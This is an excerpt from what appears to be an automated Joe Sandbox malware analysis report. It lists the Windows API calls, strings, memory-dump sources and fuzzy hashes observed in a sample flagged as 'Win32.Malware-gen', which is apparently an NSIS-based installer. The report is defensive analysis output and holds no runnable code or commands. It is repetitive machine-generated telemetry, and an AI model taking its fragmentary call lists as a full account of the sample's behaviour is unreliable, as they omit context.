                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,?), ref: 004046FD
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                                                                                        • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040472E
                                                                                                                        • GetSysColor.USER32(?), ref: 0040473F
                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404760
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                                                                                        • SendMessageW.USER32(00000000), ref: 004047E2
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                                                                                        • SetCursor.USER32(00000000), ref: 00404861
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                                                                                        • SetCursor.USER32(00000000), ref: 0040487D
                                                                                                                        • SendMessageW.USER32(00000111,?,00000000), ref: 004048AC
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                        • String ID: Call$N
                                                                                                                        • API String ID: 3103080414-3438112850
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                        • String ID: F
                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                                                                                        • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                                                                          • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                                                          • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                                                        • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                                                                                        • wsprintfA.USER32 ref: 004061E6
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                                                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                                                                          • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00406015
                                                                                                                          • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                        • String ID: %ls=%ls$[Rename]
                                                                                                                        • API String ID: 2171350718-461813615
                                                                                                                        APIs
                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                                                        • CharPrevW.USER32(?,?,76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                                                        Strings
                                                                                                                        • *?|<>/":, xrefs: 00406821
                                                                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe", xrefs: 00406813
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004067D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-418869352
                                                                                                                        • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                        • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                                                                                        • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                        • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                                                                                        • GetSysColor.USER32(00000000), ref: 00404562
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                                                                                        • SetBkMode.GDI32(?,?), ref: 0040457A
                                                                                                                        • GetSysColor.USER32(?), ref: 0040458D
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 0040459D
                                                                                                                        • DeleteObject.GDI32(?), ref: 004045B7
                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                        • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                                                                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                        • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                                                                                        • GetMessagePos.USER32 ref: 00404E7E
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404E98
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                        • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                                                                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                        • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                                                                                        • MulDiv.KERNEL32(000887A9,00000064,000889AD), ref: 00402FE1
                                                                                                                        • wsprintfW.USER32 ref: 00402FF1
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                        Strings
                                                                                                                        • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                        • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                        • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                                                                                        • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                        • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 705912BB: GlobalAlloc.KERNELBASE(00000040,?,705912DB,?,7059137F,00000019,705911CA,-000000A0), ref: 705912C5
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70592743
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70592778
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1780285237-0
                                                                                                                        • Opcode ID: 049f182124680b1f3877ddcd22d0b8b3bb2a6859428313954af268b9dac07ecb
                                                                                                                        • Instruction ID: 9c6fbfd08319bd47a1d63d053adc819dc958cb5ec642fff5549fdad71207e83b
                                                                                                                        • Opcode Fuzzy Hash: 049f182124680b1f3877ddcd22d0b8b3bb2a6859428313954af268b9dac07ecb
                                                                                                                        • Instruction Fuzzy Hash: 0C31D032124101DFC7169FA6CD88D2E7FBAFB95300326492EF202A7620D7716C14DF69
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2667972263-0
                                                                                                                        • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                        • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                                                                                        • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                        • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405EA9
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405F51
                                                                                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                        • String ID: 44v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nst8185.tmp
                                                                                                                        • API String ID: 3248276644-2284398316
                                                                                                                        APIs
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 705925C2
                                                                                                                          • Part of subcall function 705912CC: lstrcpynW.KERNEL32(00000000,?,7059137F,00000019,705911CA,-000000A0), ref: 705912DC
                                                                                                                        • GlobalAlloc.KERNEL32(00000040), ref: 70592548
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70592563
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4216380887-0
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00401E56
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                        • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3808545654-0
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,705922D8,?,00000808), ref: 705916D5
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,705922D8,?,00000808), ref: 705916DC
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,705922D8,?,00000808), ref: 705916F0
                                                                                                                        • GetProcAddress.KERNEL32(705922D8,00000000), ref: 705916F7
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70591700
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1148316912-0
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                                                        • wsprintfW.USER32 ref: 00404DF7
                                                                                                                        • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseValuelstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp
                                                                                                                        APIs
